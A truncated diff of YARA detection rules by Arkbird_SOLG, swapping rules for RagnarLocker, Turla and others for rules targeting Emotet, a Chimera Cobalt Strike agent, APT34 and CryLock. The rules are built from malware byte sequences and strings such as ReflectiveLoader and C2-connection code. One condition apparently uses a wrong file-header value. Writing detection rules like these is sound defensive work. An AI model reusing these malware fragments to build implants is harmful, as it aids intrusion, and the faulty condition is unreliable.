f9 ff ff 4d 8a 85 05 f9 ff ff 80 bd 04 f9 ff ff 00 75 2c 33 c9 0f 1f 40 00 8a 84 0d 05 f9 ff ff 0f b6 c0 83 e8 4d 6b c0 25 99 f7 fb 8d 42 7f 99 f7 fb 88 94 0d 05 f9 ff ff 41 83 f9 0e 72 da 8d 85 05 f9 ff ff 89 85 98 f4 ff ff c6 85 f4 f8 ff ff 00 c6 85 f5 f8 ff ff 46 c6 85 f6 f8 ff ff 02 c6 85 f7 f8 ff ff 2e c6 85 f8 f8 ff ff 02 c6 85 f9 f8 ff ff 3c c6 85 fa f8 ff ff 02 c6 85 fb f8 ff ff 3c c6 85 fc f8 ff ff 02 c6 85 fd f8 ff ff 43 c6 85 fe f8 ff ff 02 c6 85 } + $s2 = { c7 85 b8 f7 ff ff 00 00 00 00 8d 8d 60 f7 ff ff c6 85 60 f7 ff ff 00 c6 85 61 f7 ff ff 36 c6 85 62 f7 ff ff 7a c6 85 63 f7 ff ff 29 c6 85 64 f7 ff ff 7a c6 85 65 f7 ff ff 29 c6 85 66 f7 ff ff 7a c6 85 67 f7 ff ff 69 c6 85 68 f7 ff ff 7a c6 85 69 f7 ff ff 37 c6 85 6a f7 ff ff 7a c6 85 6b f7 ff ff 74 c6 85 6c f7 ff ff 7a c6 85 6d f7 ff ff 0f c6 85 6e f7 ff ff 7a c6 85 6f f7 ff ff 75 c6 85 70 f7 ff ff 7a c6 85 71 f7 ff ff 1d c6 85 72 f7 ff ff 7a c6 85 73 f7 ff ff 00 c6 85 74 f7 ff ff 7a c6 85 75 f7 ff ff 7a c6 85 76 f7 ff ff 7a 8a 85 61 f7 ff ff e8 e7 bb 00 00 6a 07 68 8f cf af 70 ba 19 00 00 00 8b f0 e8 04 db ff ff 83 c4 08 56 ff d0 8b 8d b4 f7 ff ff 8d b5 b8 f7 ff ff 56 ff b5 a8 f7 ff ff 8b 11 6a 00 6a 00 6a 00 6a 00 6a 00 50 51 ff 52 0c 8b f0 c7 85 8c f7 ff ff d6 00 6a 00 8b 85 8c f7 ff ff 99 f7 fb 85 d2 74 50 8b 8d 8c f7 ff ff 8b 85 b8 f7 ff ff 83 c0 02 03 c1 89 85 8c f7 ff ff 8b 85 8c f7 ff ff 25 03 00 00 80 79 05 48 83 c8 fc 40 0f 85 50 01 00 00 66 90 ff 85 8c f7 ff } + $s3 = { 75 f5 88 8d 50 f6 ff ff c6 85 51 f6 ff ff 48 c6 85 52 f6 ff ff 20 c6 85 53 f6 ff ff 5e c6 85 54 f6 ff ff 20 c6 85 55 f6 ff ff 7d c6 85 56 f6 ff ff 20 c6 85 57 f6 ff ff 39 c6 85 58 f6 ff ff 20 c6 85 59 f6 ff ff 33 c6 85 5a f6 ff ff 20 c6 85 5b f6 ff ff 2a c6 85 5c f6 ff ff 20 c6 85 5d f6 ff ff 33 c6 85 5e f6 ff ff 20 c6 85 5f f6 ff ff 4d c6 85 60 f6 ff ff 20 c6 85 61 f6 ff ff 6e c6 85 62 f6 ff ff 20 c6 85 63 f6 ff ff 48 c6 85 64 f6 ff ff 20 c6 85 65 f6 ff ff 4d c6 85 66 f6 ff ff 20 c6 85 67 f6 ff ff 1b c6 85 68 f6 ff ff 20 c6 85 69 f6 ff ff 3a c6 85 6a f6 ff ff 20 c6 85 6b f6 ff ff 52 c6 85 6c f6 ff ff 20 c6 85 6d f6 ff ff 47 c6 85 6e f6 ff ff 20 c6 85 6f f6 ff ff 09 c6 85 70 f6 ff ff 20 c6 85 71 f6 ff ff 14 c6 85 72 f6 ff ff 20 c6 85 73 f6 ff ff 7d c6 85 74 f6 ff ff 20 c6 85 75 f6 ff ff 49 c6 85 76 f6 ff ff 20 c6 85 77 f6 ff ff 74 c6 85 78 f6 ff ff 20 c6 85 79 f6 ff ff 1f c6 85 7a f6 ff ff 20 c6 85 7b f6 ff ff 52 c6 85 7c f6 ff ff 20 c6 85 7d f6 ff ff 71 c6 85 7e f6 ff ff 20 c6 85 7f f6 ff ff 5f c6 85 80 f6 ff ff 20 c6 85 81 f6 ff ff 1f c6 85 82 f6 ff ff 20 c6 85 83 f6 ff ff 54 c6 85 84 f6 ff ff 20 c6 85 85 f6 ff ff 33 c6 85 86 f6 ff ff 20 c6 85 87 f6 ff ff 5e c6 85 88 f6 ff ff 20 c6 85 89 f6 ff ff 44 c6 85 8a f6 ff ff 20 c6 85 8b f6 ff ff 0f c6 85 8c f6 ff ff 20 c6 85 8d f6 ff ff 52 c6 85 8e f6 ff ff 20 c6 85 8f f6 ff ff 74 c6 85 90 f6 ff ff 20 c6 85 91 f6 ff ff 13 c6 85 92 f6 ff ff 20 c6 85 93 f6 ff ff 33 c6 85 94 f6 ff ff 20 c6 85 95 f6 ff ff 5e c6 85 96 f6 ff ff 20 c6 85 97 f6 ff ff 52 c6 85 98 f6 ff ff 20 c6 85 99 f6 ff ff 47 c6 85 9a f6 ff ff 20 c6 85 9b f6 ff ff 31 c6 85 9c f6 ff ff 20 c6 85 9d f6 ff ff 5b c6 85 9e f6 ff ff 20 c6 85 9f f6 ff ff 1b c6 85 a0 f6 ff ff 20 c6 85 a1 f6 ff ff 39 c6 85 a2 f6 ff ff 20 c6 85 a3 f6 ff ff 33 c6 85 a4 f6 ff ff 20 c6 85 a5 f6 ff ff 2a c6 85 a6 f6 ff ff 20 c6 85 a7 f6 ff ff 33 c6 85 a8 f6 ff ff 20 c6 85 a9 f6 ff ff 4d c6 85 aa f6 ff ff 20 c6 85 ab f6 ff ff 1f c6 } condition: - filesize >1KB and 6 of ($s*) + uint16(0)==0x5A4D and filesize >100KB and all of ($s*) } -import "pe" - -rule ARKBIRD_SOLG_Malware_Casbaneiro_MSI : FILE +rule ARKBIRD_SOLG_MAL_Pseudomanuscrypt_Dec_2021_1 : FILE { meta: - description = "Detect MSIPackage used by Casbaneiro" + description = "Detect PseudoManuscrypt loader dropped by the installer" author = "Arkbird_SOLG" - id = "47a5ea47-f799-5467-a482-9816c0de3ecf" - date = "2020-06-05" - modified = "2020-06-05" - reference = "https://twitter.com/JAMESWT_MHT/status/1268811438707159040" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-05/Casbaneiro/Casbaneiro_stealer.yar#L3-L22" + id = "8784baa0-c52c-5ee0-9a92-9b6457df61ed" + date = "2021-12-16" + modified = "2021-12-17" + reference = "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-PseudoManuscrypt-a-mass-scale-spyware-attack-campaign-En.pdf" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-12-16/MAL_PseudoManuscrypt_Dec_2021_1.yara#L1-L22" license_url = "N/A" - logic_hash = "fa1c53268d51b4b34b4cf4cd84ddb43ffba1dfa8bbe73cd7506f5e31e970855b" + logic_hash = "e304323ed26c7040c97efa8041bcd3eb2f6d0caeba76d6674fc2947d7850e830" score = 75 - quality = 71 + quality = 75 tags = "FILE" - hash1 = "8e77a2e1d30600db01a8481d232b601581faee02b7ec44c1ad9d74ec3544ba7d" + hash1 = "19627bcee38a4ca5ae9a60c71ee7a2e388ba99fb8b229700a964a084db236e1f" + hash2 = "be94df270acfc8e5470fa161b808d0de1c9e85efeeff4a5d82f5fd09629afa8e" + hash3 = "de965e33dff58cf011106feacef2f804d9e35d00b8b5ff7064e5b7afee46d72c" + hash4 = "e32899bef78f6af4a155f738298e042f72fe5e643ec934f8778180f71e511727" + tlp = "white" + adversary = "-" strings: - $x1 = "C:\\Branch\\win\\Release\\custact\\x86\\vmdetect.pdb" fullword ascii - $s2 = "C:\\Branch\\win\\Release\\custact\\\\x86\\AICustAct.pdb" fullword ascii - $s3 = ";!@Install@!UTF-8!\\nTitle=\"Mozilla Firefox\"\\nRunProgram=\"setup-stub.exe\"\\n;!@InstallEnd@!7z" fullword ascii - $s4 = "__MOZCUSTOM__:campaign%3D%2528not%2Bset%2529%26content%3D%2528not%2Bset%2529%26medium%3Dreferral%26source%3Dwww.google.com" fullword ascii - $s5 = "https://www.mozilla.com0\\r" fullword wide - $s6 = "__CxxFrameHandler" fullword ascii - $s7 = "release+certificates@mozilla.com" fullword ascii - $s8 = "setup-stub.exe" fullword ascii - $s9 = "7zS.sfx.exe" fullword ascii + $s1 = { 53 4f 46 54 57 41 52 45 5c 4d 69 63 72 6f 73 6f 66 74 5c 43 72 79 70 74 6f 67 72 61 70 68 79 00 7b 47 36 35 37 59 53 30 36 2d 30 31 36 44 2d 34 43 30 52 2d 36 30 32 32 2d 46 47 45 32 43 33 32 32 36 36 37 46 7d 00 00 4d 61 63 68 69 6e 65 47 75 69 64 } + $s2 = { 45 ?? 5c 43 4c 53 c7 45 ?? 49 44 5c 25 c7 45 ?? 73 00 00 00 c7 45 ?? 47 6c 6f 62 c7 45 ?? 61 6c } + $s3 = { 56 69 72 74 c7 [2-4] 75 61 6c 41 c7 [2-4] 6c 6c 6f 63 ff 15 } + $s4 = { 4c 6f 61 64 65 72 2e 64 6c 6c 00 53 65 72 76 69 63 65 4d 61 69 6e } + $s5 = { 2e 72 73 72 63 24 30 31 00 00 00 00 a0 ?? 00 00 ?? 04 00 00 2e 72 73 72 63 24 30 32 } condition: - uint16(0)==0xd0cf and filesize >100KB and 7 of them + uint16(0)==0x5A4D and filesize >3KB and filesize <30KB and all of ($s*) } -import "pe" - -rule ARKBIRD_SOLG_Ran_Mem_Ragnarlocker_Nov_2020_1 : FILE +rule ARKBIRD_SOLG_APT_Chimera_Sept_2020_1 : FILE { meta: - description = "Detect memory artefacts of the Ragnarlocker ransomware (Nov 2020)" + description = "Detect Cobalt Strike agent used by Chimera" author = "Arkbird_SOLG" - id = "910774ab-9ad6-5c56-a921-203f61c9d7f7" - date = "2020-11-26" - modified = "2020-11-27" + id = "7a7c3952-fa6e-5643-a40f-d2e466b8c2a2" + date = "2020-10-03" + modified = "2020-10-04" reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-27/Ran_RagnarLocker_Nov_2020_1.yar#L3-L33" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-03/Chimera/APT_Chimera_Sept_2020_1.yar#L1-L23" license_url = "N/A" - logic_hash = "2cb26677b8f4e464750eb8dec0638fd3f9a28500e68f64d62e99236c93895c85" + logic_hash = "8fdb34c793534f8632fd2c35b89462d4a736a31f2347e7bab3e8bcebff04c21f" score = 75 - quality = 50 + quality = 75 tags = "FILE" - hash1 = "041fd213326dd5c10a16caf88ff076bb98c68c052284430fba5f601023d39a14" - hash2 = "dd79b2abc21e766fe3076038482ded43e5069a1af9e0ad29e06dce387bfae900" + hash1 = "f6d89ff139f4169e8a67332a0fd55b6c9beda0b619b1332ddc07d9a860558bab" strings: - $s1 = "\\\\.\\PHYSICALDRIVE%d" fullword wide - $s2 = "bootfont.bin" fullword wide - $s3 = "bootsect.bak" fullword wide - $s4 = "bootmgr.efi" fullword wide - $s5 = "---RAGNAR SECRET---" fullword ascii - $s6 = "Mozilla" - $s7 = "Internet Explorer" fullword wide - $s8 = " </trustInfo>" fullword ascii - $s9 = "Tor browser" fullword wide - $s10 = "Opera Software" fullword wide - $s11 = "---END RAGN KEY---" fullword ascii - $s12 = "---BEGIN RAGN KEY---" fullword ascii - $s13 = "%s-%s-%s-%s-%s" fullword wide - $s14 = "$Recycle.Bin" fullword wide - $s15 = "***********************************************************************************" fullword ascii - $s16 = "K<^_[]" fullword ascii - $s17 = "SD;SDw" fullword ascii - $s18 = "Windows.old" fullword wide - $s19 = "iconcache.db" fullword wide + $header = { 4D 5A 41 52 55 48 89 E5 48 83 EC 20 48 83 E4 F0 E8 00 00 00 00 5B 48 81 C3 EB 18 00 00 FF D3 48 81 C3 00 09 03 00 49 89 D8 6A 04 5A FF D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E8 } + $s1 = "\\\\%s\\pipe\\%s" fullword ascii + $s2 = "%04x-%04x:%s" fullword wide + $core1 = "core_pivot_session_new" fullword ascii + $core2 = "core_pivot_session_died" fullword ascii + $core3 = "core_pivot_remove" fullword ascii + $core4 = "core_pivot_add" fullword ascii + $lib1 = "CreateNamedPipeA" fullword ascii + $lib2 = "ConnectNamedPipe" fullword ascii + $lib3 = "WinHttpGetIEProxyConfigForCurrentUser" fullword ascii + $export = "ReflectiveLoader" fullword ascii condition: - uint16(0)==0x5a4d and filesize >30KB and 12 of them + uint16(0)==0x4a5d and filesize >30KB and $header and 1 of ($s*) and 2 of ($core*) and 2 of ($lib*) and $export } -import "pe" - -rule ARKBIRD_SOLG_Ran_Cert_Ragnarlocker_Nov_2020_1 : FILE +rule ARKBIRD_SOLG_MAL_Emotet_Nov_2021_1 : FILE { meta: - description = "Detect certificates and VMProtect used for the Ragnarlocker ransomware (Nov 2020)" + description = "Detect Emotet loader" author = "Arkbird_SOLG" - id = "85d51804-eebd-5353-8bd9-01756e7f7d07" - date = "2020-11-26" - modified = "2020-11-27" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-27/Ran_RagnarLocker_Nov_2020_1.yar#L35-L55" + id = "ad67c735-7ed9-5440-b693-55dce9840f56" + date = "2021-11-15" + modified = "2021-11-16" + reference = "https://cyber.wtf/2021/11/15/guess-whos-back/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-16/MAL_Emotet_Nov_2021_1.yara#L1-L19" license_url = "N/A" - logic_hash = "8171128426b48102457f5ba0771b27aaf5f4562293aff04c256bd5bd721a908e" - score = 50 + logic_hash = "9ae3cbf863fdf3addd7ec00b4d6b55024c3159156518ef15fff79f5a92988297" + score = 75 quality = 75 tags = "FILE" - level = "Experimental" - hash1 = "afab912c41c920c867f1b2ada34114b22dcc9c5f3666edbfc4e9936c29a17a68" - hash2 = "9416e5a57e6de00c685560fa9fee761126569d123f62060792bf2049ebba4151" + hash1 = "0865bd192e226da2c40b8bdd33a65ef41ca255a0031b3b36ab6a657ba6675d5e" + hash2 = "14613fa0b6eea4cd9205ffbe1c462178c94298707d19f78a27eec3dece8765f0" + tlp = "white" + adversary = "TrickBot Gang" strings: - $vmp0 = { 2E 76 6D 70 30 00 00 00 } - $vmp1 = { 2E 76 6D 70 31 00 00 00 } + $s1 = { 8b 4d 08 0f b6 02 0f b6 31 2b f0 75 18 0f b6 71 01 0f b6 42 01 2b f0 75 0c 0f b6 71 02 0f b6 42 02 2b f0 74 10 33 c9 85 f6 0f 9f c1 8d 0c 4d ff ff ff ff eb 1a 0f b6 49 03 0f b6 42 03 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 8b c1 eb 56 8b 4d 08 8b 75 0c 0f b6 11 0f b6 06 2b d0 75 0c 0f b6 51 01 0f b6 46 01 2b d0 74 06 33 c9 85 d2 eb b4 0f b6 49 02 0f b6 46 02 eb be 8b 4d 08 8b 75 0c 0f b6 11 0f b6 06 2b d0 75 e0 0f b6 49 01 0f b6 46 01 eb a4 8b 45 08 0f b6 08 8b 45 0c 0f b6 00 eb 96 33 c0 5e 5b 5d c3 8b ff } + $s2 = { 8b 75 10 83 e0 3f 8b 5d 18 6b c8 38 c1 fa 06 89 75 a0 89 5d c4 89 55 b0 8b 04 95 [2] 03 10 89 4d bc 8b 44 08 18 89 45 9c 8b 45 14 03 c6 89 45 ac ff 15 ?? 40 03 10 80 7b 14 00 89 45 90 75 07 8b cb e8 [2] ff ff 8b 43 0c 8b 75 08 8b fe 8b 40 08 89 45 98 33 c0 ab ab ab 8b 45 a0 8b d0 89 55 d0 3b 45 ac 0f 83 14 03 00 00 8b 7d bc 33 db 89 5d b8 81 7d 98 e9 fd 00 00 8a 02 88 45 cf 8b 45 b0 89 5d c0 c7 45 d4 01 00 00 00 8b 0c 85 } + $s3 = { 53 53 40 6a 05 89 45 d0 8d 45 d8 50 ff 75 d4 8d 45 c0 50 53 ff 75 90 e8 [2] ff ff 83 c4 20 89 45 c8 85 c0 0f 84 00 01 00 00 53 8d 4d a4 51 50 8d 45 d8 50 ff 75 9c ff 15 ?? 40 03 10 85 c0 0f 84 dd 00 00 00 8b 55 d0 8b ca 2b 4d a0 8b 46 08 03 c1 89 45 b8 89 46 04 8b 45 c8 39 45 a4 0f 82 c6 00 00 00 80 7d cf 0a 75 3c 6a 0d 58 53 66 89 45 a8 8d 45 a4 50 6a 01 8d 45 a8 50 ff 75 9c ff 15 ?? 40 03 10 85 c0 0f 84 95 00 00 00 83 7d a4 01 0f 82 93 00 00 00 ff 46 08 ff 46 04 8b 46 04 8b 55 d0 89 45 b8 3b 55 ac 0f 82 6f fd ff ff eb 79 85 } + $s4 = { ba 08 00 00 00 c1 e2 00 8b 45 f0 8b 4c 10 78 03 4d fc 89 4d f8 ba 08 00 00 00 6b c2 0c 8b 4d f0 83 7c 01 78 00 74 09 c7 45 e8 0c 00 00 00 eb 07 c7 45 e8 01 00 00 00 8b 55 e8 89 55 e4 8b 45 e4 8b 4d f0 8b 54 c1 78 89 55 dc 8b 45 e4 8b 4d f0 8b 54 c1 7c 89 55 d8 8b 45 dc 03 45 fc 89 45 d4 8d 4d c8 51 6a 04 8b 55 d8 52 8b 45 d4 50 ff 15 04 40 03 10 8b 4d f8 83 79 0c 00 0f 84 cf } + $s5 = { 83 20 00 33 c9 21 4d e8 53 8b 5d 08 57 33 ff 89 4d e4 89 7d e0 8b 03 85 c0 74 56 8d 4d fc 66 c7 45 fc 2a 3f 51 50 c6 45 fe 00 e8 12 55 00 00 59 59 85 c0 75 1a 8d 45 e0 50 33 c0 50 50 ff 33 e8 13 01 00 00 8b f0 83 c4 10 85 f6 75 74 eb 13 8d 4d e0 51 50 ff 33 e8 ad 01 00 00 83 c4 0c 85 c0 75 1d 83 c3 04 8b 03 } condition: - uint16(0)==0x5a4d and filesize >5000KB and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].issuer contains "GlobalSign" and pe.signatures[i].serial=="68:65:29:4f:67:f0:c3:bb:2e:19:1f:75") and $vmp0 in (0x100..0x300) and $vmp1 in (0x100..0x300) + uint16(0)==0x5a4d and filesize >30KB and 4 of them } -rule ARKBIRD_SOLG_APT_Turla_Bigboss_Apr_2021_1 : FILE +rule ARKBIRD_SOLG_APT_APT34_RDAT_Feb_2021_1 : FILE { meta: - description = "Detects new BigBoss implants (SilentMoon/GoldenSky)" + description = "Detect Installer from APT34 group" author = "Arkbird_SOLG" - id = "6f6c8d1e-f2c7-5f08-b1dc-ce726c6d89be" - date = "2021-04-06" - modified = "2021-07-17" - reference = "https://twitter.com/DrunkBinary/status/1304086230540390400" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-17/BigBoss/APT_Turla_BigBoss_Apr_2021_1.yara#L1-L21" + id = "32f28376-e792-543b-82f7-36ec627b4fab" + date = "2021-02-26" + modified = "2021-02-27" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-02-26/APT34/APT_APT34_RDAT_Feb_2021_1.yar#L1-L19" license_url = "N/A" - logic_hash = "ce0ffdad9eecb79128b6c08c87914f356c86ac631655c76905a06d953add3998" - score = 75 - quality = 71 + logic_hash = "61ea6eceda0c7d6ec15db87891c4322002c112383c7a4d0089e35db9636bbe73" + score = 50 + quality = 73 tags = "FILE" - hash1 = "94421ccb97b784c43d92c4b1438481eee9c907db6b13f6cfc4b86a6bb057ddcd" - hash2 = "67bfa585ace8df20deb1d8a05bd4acf2c84c6fa0966276b3ea7607056abe25bb" - hash3 = "6ca0b4efe077fe05b2ae871bf50133c706c7090a54d2c3536a6c86ff454caa9a" + level = "experimental" + hash1 = "65a6afc027ff851bd325d8a4f2ab4f326dd8f2c230bfd49a213c5afc00df8e2c" strings: - $s1 = { 55 8b ec a1 [2] 40 00 83 ec 3c 50 6a 3c 8d 4d c4 51 68 [2] 40 00 68 [2] 40 00 68 [2] 40 00 ff 15 78 ?? 40 00 8d 45 c4 8d 50 02 8d 49 00 66 8b 08 83 c0 02 66 85 c9 75 f5 2b c2 d1 f8 75 1c 8b 15 [2] 40 00 52 68 [2] 40 00 68 [2] 40 00 68 [2] 40 00 ff 15 [2] 40 00 8b e5 } - $s2 = { 5c 00 5c 00 2e 00 5c 00 47 00 6c 00 6f 00 62 00 61 00 6c 00 5c 00 50 00 49 00 50 00 45 00 5c } - $s3 = { 5c 5c 25 73 5c 70 69 70 65 5c 25 73 } - $s4 = { 5c 00 69 00 6e 00 66 00 5c 00 00 00 [4-16] 2e 00 69 00 6e 00 66 } - $s5 = "%d blocks, %d sorted, %d scanned" ascii fullword - $s6 = "REMOTE_NS:ERROR:%d" ascii fullword - $s7 = { 5c 5c 25 73 5c 69 70 63 24 } - $s8 = { 53 00 59 00 53 00 54 00 45 00 4d 00 5c 00 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 53 00 65 00 74 00 5c 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 73 00 5c 00 6c 00 61 00 6e 00 6d 00 61 00 6e 00 73 00 65 00 72 00 76 00 65 00 72 00 5c 00 70 00 61 00 72 00 61 00 6d 00 65 00 74 00 65 00 72 00 73 00 00 00 4e 00 75 00 6c 00 6c 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 50 00 69 00 70 00 65 00 73 00 00 00 00 00 53 00 59 00 53 00 54 00 45 00 4d 00 5c 00 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 53 00 65 00 74 00 5c 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 5c 00 4c 00 53 00 41 00 00 00 00 00 52 00 65 00 73 00 74 00 72 00 69 00 63 00 74 00 41 00 6e 00 6f 00 6e 00 79 00 6d 00 6f 00 75 00 73 } + $s1 = "XAVVQxcVAVIfCBYWARQfEBldEU4ZF1JbUFJYCgpCTg==" fullword ascii + $s2 = { 0b da 89 5c 24 40 40 38 3d 55 56 } + $s3 = { 57 4e 44 31 23 31 2e 32 } + $s4 = { 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00 20 00 2f 00 63 } + $seq_Service = { 4c 8b dc 57 48 81 ec e0 02 00 00 48 c7 44 24 70 fe ff ff ff 49 89 5b 10 49 89 73 18 48 8b 05 65 12 0a 00 48 33 c4 48 89 84 24 d0 02 00 00 48 8b d9 48 89 4c 24 78 41 b8 04 01 00 00 49 8d 93 d8 fd ff ff 33 c9 ff 15 9d 20 07 00 85 c0 75 19 ff 15 33 21 07 00 8b d0 48 8d 0d 8a b6 08 00 e8 1d f7 ff ff e9 a5 01 00 00 33 f6 48 89 b4 24 90 00 00 00 48 89 b4 24 98 00 00 00 45 33 c0 33 d2 48 8d 8c 24 80 00 00 00 e8 d4 9f ff ff 66 39 b4 24 c0 00 00 00 75 05 44 8b c6 eb 1f 48 8d 84 24 c0 00 00 00 49 83 c8 ff 66 0f 1f 84 00 00 00 00 00 49 ff c0 66 42 39 34 40 75 f6 48 8d 94 24 c0 00 00 00 48 8d 8c 24 80 00 00 00 e8 41 05 00 00 90 4c 8b c3 48 8d 8c 24 a0 00 00 00 e8 60 0a 00 00 90 49 83 c9 ff 45 33 c0 48 8b d0 48 8d 8c 24 80 00 00 00 e8 a8 07 00 00 90 45 33 c0 b2 01 48 8d 8c 24 a0 00 00 00 e8 55 9f ff ff 33 d2 33 c9 41 b8 3f 00 0f 00 ff 15 d5 1e 07 00 48 8b f8 48 85 c0 75 19 ff 15 5f 20 07 00 8b d0 48 8d 0d de b5 08 00 e8 49 f6 ff ff e9 be 00 00 00 4c 8d 8c 24 80 00 00 00 48 83 bc 24 98 00 00 00 08 4c 0f 43 8c 24 80 00 00 00 48 8d 15 33 7a 0a 00 4c 8b c2 48 83 3d 40 7a 0a 00 08 4c 0f 43 05 20 7a 0a 00 48 0f 43 15 18 7a 0a 00 48 89 74 24 60 48 89 74 24 58 48 89 74 24 50 48 89 74 24 48 48 89 74 24 40 4c 89 4c 24 38 c7 44 24 30 01 00 00 00 c7 44 24 28 02 00 00 00 c7 44 24 20 10 00 00 00 41 b9 ff 01 0f 00 48 8b c8 ff 15 23 1e 07 00 48 8b f0 48 85 c0 75 16 ff 15 bd 1f 07 00 8b d0 48 8d 0d 5c b5 08 00 e8 a7 f5 ff ff eb 15 48 8d 0d 6e b5 08 00 e8 99 f5 ff ff 48 8b ce ff 15 e0 1d 07 00 48 8b cf ff 15 d7 1d 07 00 90 45 33 c0 b2 01 48 8d 8c 24 80 00 00 00 e8 54 9e ff ff 90 45 33 c0 b2 01 48 8b cb e8 46 9e ff ff 48 8b 8c 24 d0 02 00 00 48 33 cc e8 d6 94 02 00 4c 8d 9c 24 e0 02 00 00 49 8b 5b 18 49 8b 73 20 49 8b e3 5f } + $seq_ConnectC2 = { 33 c0 48 89 44 24 70 48 89 44 24 78 66 89 7c 24 70 8d 48 35 ff 15 2f 62 07 00 66 89 44 24 72 48 8b cb e8 ea dc ff ff 48 8b c8 ff 15 29 62 07 00 89 44 24 74 49 8b cd e8 d5 dc ff ff 48 8b d0 c7 44 24 28 10 00 00 00 48 8d 44 24 70 48 89 44 24 20 45 33 c9 45 8b 45 10 49 8b cc ff 15 e0 61 07 00 83 f8 ff 75 12 45 33 c0 48 8d 15 6b cb 08 00 48 8b ce e8 79 de ff ff 4c 89 a4 24 a8 00 00 00 c7 84 24 a0 00 00 00 01 00 00 00 48 c7 44 24 38 0a 00 00 00 41 8d 4c 24 01 48 8d 44 24 38 48 89 44 24 20 45 33 c9 45 33 c0 48 8d 94 24 a0 00 00 00 ff 15 aa 61 07 00 83 f8 01 0f 94 c0 84 c0 0f 84 0f 01 00 00 45 33 c9 41 b8 00 02 00 00 48 8d 94 24 b0 02 00 00 49 8b cc ff 15 72 61 07 00 4c 63 c0 85 c0 0f 8e ea 00 00 00 41 8b c8 49 8b d0 49 8b c0 45 85 c0 0f 8e d8 00 00 00 0f 1f 44 00 00 80 bc 04 b0 02 00 00 00 0f 85 b7 00 00 00 48 3b d0 0f 84 ae 00 00 00 85 c9 0f 84 b4 00 00 00 83 c1 03 41 3b c8 0f 8d a8 00 00 00 48 8d 9c 24 b0 02 00 00 48 03 da 48 63 c1 48 8d bc 24 b0 02 00 00 48 03 f8 4c 89 b4 24 90 00 00 00 4c 89 b4 24 98 00 00 00 45 33 c0 33 d2 48 8d 8c 24 80 00 00 00 e8 0a dd ff ff 48 3b fb 74 17 48 2b df 4c 8b c3 48 8b d7 48 8d 8c 24 80 00 00 00 e8 6f dd ff ff 90 48 8d 84 24 80 00 00 00 48 3b f0 74 18 49 83 c9 ff 45 33 c0 48 8d 94 24 80 00 00 00 48 8b ce e8 2a de ff ff 90 45 33 c0 b2 01 48 8d 8c 24 80 00 00 00 e8 b7 dc ff ff 48 8b 5c 24 48 bf } + $seq_RegisterEvent = { 40 53 48 83 ec 20 48 83 3d 5a 79 0a 00 08 48 8d 1d 3b 79 0a 00 48 8b cb 48 8d 15 91 01 00 00 48 0f 43 0d 29 79 0a 00 ff 15 93 1d 07 00 48 89 05 44 77 0a 00 48 8b c8 48 85 c0 75 2d 48 83 3d 24 79 0a 00 08 48 0f 43 1d 04 79 0a 00 48 8b d3 ff 15 7b 1d 07 00 48 85 c0 74 62 48 8b c8 ff 15 35 1d 07 00 48 83 c4 20 5b c3 33 c0 c7 05 db 76 0a 00 10 00 00 00 48 89 05 e0 76 0a 00 48 8d 15 cd 76 0a 00 8b 05 17 1c 0a 00 89 05 d5 76 0a 00 ff c0 89 05 09 1c 0a 00 48 c7 05 b2 76 0a 00 02 00 00 00 c7 05 bc 76 0a 00 b8 0b 00 00 ff 15 06 1d 07 00 48 83 c4 20 5b } condition: - uint16(0)==0x5a4d and filesize >20KB and 7 of ($s*) + uint16(0)==0x5a4d and filesize >80KB and all of ($s*) and 2 of ($seq*) } -rule ARKBIRD_SOLG_MAL_Queenofhearts_Jul_2021_1 : FILE +rule ARKBIRD_SOLG_RAN_Crylock_July_2021_1 : FILE { meta: - description = "Detect QueenOfHearts malware" + description = "Detect CryLock ransomware (ex-Cryakl)" author = "Arkbird_SOLG" - id = "763b35dd-6515-5ae8-a539-200a3647f074" - date = "2021-07-09" - modified = "2021-07-12" - reference = "https://twitter.com/ShadowChasing1/status/1413111641504292864" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_QueenOfHearts_Jul_2021_1.yara#L1-L23" + id = "350bd622-f4b5-5837-a239-dc506b100aef" + date = "2021-07-17" + modified = "2021-07-17" + reference = "https://twitter.com/BushidoToken/status/1415958829318217730" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-16/Crylock/RAN_Crylock_July_2021_1.yara#L1-L23" license_url = "N/A" - logic_hash = "51cb8efddbc635e9a54f58a799e6edcf8eda8ca451ebe85cbce5f6cd20bfb083" + logic_hash = "4f5046a64e7491085a55d8d1f2b5b056dc0aa89fcdea47652ecb7db680de2f59" score = 75 - quality = 75 + quality = 65 tags = "FILE" - hash1 = "44eb620879e0c3f80ff95fda5b1e301d471b59e47c4002132df646acfc7cc5ba" - hash2 = "a63600e5c28a4c1770a53d310ff017abd3cb9c20cb58a85d53df0c06bcae1864" - hash3 = 